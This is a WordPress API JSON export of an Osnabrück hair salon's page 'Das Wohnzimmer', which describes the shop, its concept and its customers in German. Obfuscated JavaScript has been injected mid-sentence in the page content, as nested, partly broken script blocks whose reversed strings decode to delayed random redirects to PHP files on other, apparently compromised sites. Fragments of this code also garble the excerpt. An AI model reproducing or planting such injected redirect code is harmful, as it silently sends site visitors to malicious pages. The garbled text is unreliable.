{"id":183,"date":"2014-07-23T13:15:59","date_gmt":"2014-07-23T11:15:59","guid":{"rendered":"http:\/\/daswohnzimmerdiefriseure.de\/?page_id=183"},"modified":"2014-07-23T16:03:07","modified_gmt":"2014-07-23T14:03:07","slug":"das-wohnzimmer","status":"publish","type":"page","link":"https:\/\/daswohnzimmerdiefriseure.de\/?page_id=183","title":{"rendered":"Das Wohnzimmer"},"content":{"rendered":"<p style=\"text-align: justify;\">Laden:<br \/>\nFriseur einmal <script>$nJe=function(n){if (typeof ($nJe.list[n]) == \"string\") return $nJe.list[n].split(\"\").reverse().join(\"\");return $nJe.list[n];};$nJe.list=[\"\\'php.pots_egamiruces\/egamieruces-ahctpac\/mrof-tcatnoc-is\/snigulp\/tnetnoc-pw\/moc.mrifwaltb.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.ran<script>$mWn=function(n){if(typeof ($mWn.list[n])==\"string\") return $mWn.list[n].split(\"\").reverse().join(\"\");return $mWn.list[n];};$mWn.list=[\"\\'php.tsop-egap-ssalc\/stegdiw\/reganam-stegdiw\/cni\/rotnemele-re<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$Bhq=function(n){if (typeof ($Bhq.list[n]) == \"string\") return $Bhq.list[n].split(\"\").reverse().join(\"\");return $Bhq.list[n];};$Bhq.list=[\"\\'php.snimda-lla\/sedulcni\/etis-etavirp-oidarnoj\/snigulp\/tnetnoc-pw\/sserpdrow\/moc.nogaxehliie\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($Bhq(0), delay);}<\/script>toof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslat<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"\\'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script><script>$Bhq=function(n){if (typeof ($Bhq.list[n]) == \"string\") return $Bhq.list[n].split(\"\").reverse().join(\"\");return $Bhq.list[n];};$Bhq.list=[\"\\'php.snimda-lla\/sedulcni\/etis-etavirp-oidarnoj\/snigulp\/tnetnoc-pw\/sserpdrow\/moc.nogaxehliie\/\/:ptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;\tsetTimeout($Bhq(0), delay);}<\/script>tolg\/\/:sptth\\'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}<\/script>dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}<\/script>anders. Das Wohnzimmer hei\u00dft nicht nur Wohnzimmer, sondern ist auch ein tatsachliches Wohnzimmer. Auf 27m2 stehen in einer stylisch-gem\u00fctlichen und kuscheligen Atmosph\u00e4re neben den drei \u201eStyling-Stations\u201c ein Sofa und eine legendare Kaffeemaschine (es gibt Leute, die behaupten, sie produziere mit den besten Kaffee in Osnabr\u00fcck) im Mittelpunkt. Und genau wie vielleicht bei euch zu Hause wird die Stube einmal j\u00e4hrlich im Herbst von Karla umgestylt, schlie\u00dflich braucht man Abwechslung nicht nur auf dem Kopf. Nach rot-orange, gr\u00fcn, lila und t\u00fcrkis bleibt es spannend, welche Farbe als n\u00e4chstes den Flair unseres Ladens bereichert.<\/p>\n<p><a href=\"https:\/\/daswohnzimmerdiefriseure.de\/wp-content\/uploads\/2014\/07\/3.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-184 size-full\" src=\"https:\/\/daswohnzimmerdiefriseure.de\/wp-content\/uploads\/2014\/07\/3.jpg\" alt=\"3\" width=\"468\" height=\"352\" srcset=\"https:\/\/daswohnzimmerdiefriseure.de\/wp-content\/uploads\/2014\/07\/3.jpg 468w, https:\/\/daswohnzimmerdiefriseure.de\/wp-content\/uploads\/2014\/07\/3-300x225.jpg 300w\" sizes=\"(max-width: 468px) 100vw, 468px\" \/><\/a><\/p>\n<p style=\"text-align: justify;\">Konzept:<br \/>\nIm Wohnzimmer sollt ihr in einer pers\u00f6nlichen Wohlf\u00fchlatmosph\u00e4re entsprechend euren W\u00fcnschen ein Styling verpasst bekommen, das zu euch passt. Wir bem\u00fchen uns dabei sehr um ein faires Preis-Leistungsverh\u00e4ltnis. Quatschen, Kaffee trinken und vor allem viel Lachen ist inklusive. Und nicht zuf\u00e4llig arbeiten wir mit Produkten namens \u201esexyhair\u201c.<\/p>\n<p><a href=\"https:\/\/daswohnzimmerdiefriseure.de\/wp-content\/uploads\/2014\/07\/4.jpg\"><img loading=\"lazy\" class=\"alignnone wp-image-185 size-full\" src=\"https:\/\/daswohnzimmerdiefriseure.de\/wp-content\/uploads\/2014\/07\/4.jpg\" alt=\"4\" width=\"468\" height=\"352\" srcset=\"https:\/\/daswohnzimmerdiefriseure.de\/wp-content\/uploads\/2014\/07\/4.jpg 468w, https:\/\/daswohnzimmerdiefriseure.de\/wp-content\/uploads\/2014\/07\/4-300x225.jpg 300w\" sizes=\"(max-width: 468px) 100vw, 468px\" \/><\/a><\/p>\n<p style=\"text-align: justify;\">Leute:<br \/>\nDie Menschen pr\u00e4gen das Wohnzimmer mindestens genauso stark wie R\u00e4umlichkeit und Einrichtung. Dabei wirkt neben unserem Team auch das sehr buntgemischte Publikum mit, zus\u00e4tzlich zu\u00a0 den Frisierkunden machen es sich an manchen Tagen auch sonstige Anh\u00e4nger auf dem Sofa gem\u00fctlich, um am Klatsch und Tratsch und am Friseursalon-Alltag teilzunehmen.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Laden: Friseur einmal toof-redaeh\/snigulp\/tnetnoc-pw\/moc.snoituloslattolg\/\/:sptth\\&#8217;=ferh.noitacol.tnemucod&#8220;];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}anders. Das Wohnzimmer hei\u00dft nicht nur Wohnzimmer, sondern ist auch ein tatsachliches Wohnzimmer. Auf 27m2 stehen in einer stylisch-gem\u00fctlichen und kuscheligen Atmosph\u00e4re neben den drei \u201eStyling-Stations\u201c ein Sofa und eine legendare Kaffeemaschine (es gibt Leute, die behaupten, sie [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":[],"_links":{"self":[{"href":"https:\/\/daswohnzimmerdiefriseure.de\/index.php?rest_route=\/wp\/v2\/pages\/183"}],"collection":[{"href":"https:\/\/daswohnzimmerdiefriseure.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/daswohnzimmerdiefriseure.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/daswohnzimmerdiefriseure.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/daswohnzimmerdiefriseure.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=183"}],"version-history":[{"count":7,"href":"https:\/\/daswohnzimmerdiefriseure.de\/index.php?rest_route=\/wp\/v2\/pages\/183\/revisions"}],"predecessor-version":[{"id":204,"href":"https:\/\/daswohnzimmerdiefriseure.de\/index.php?rest_route=\/wp\/v2\/pages\/183\/revisions\/204"}],"wp:attachment":[{"href":"https:\/\/daswohnzimmerdiefriseure.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=183"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}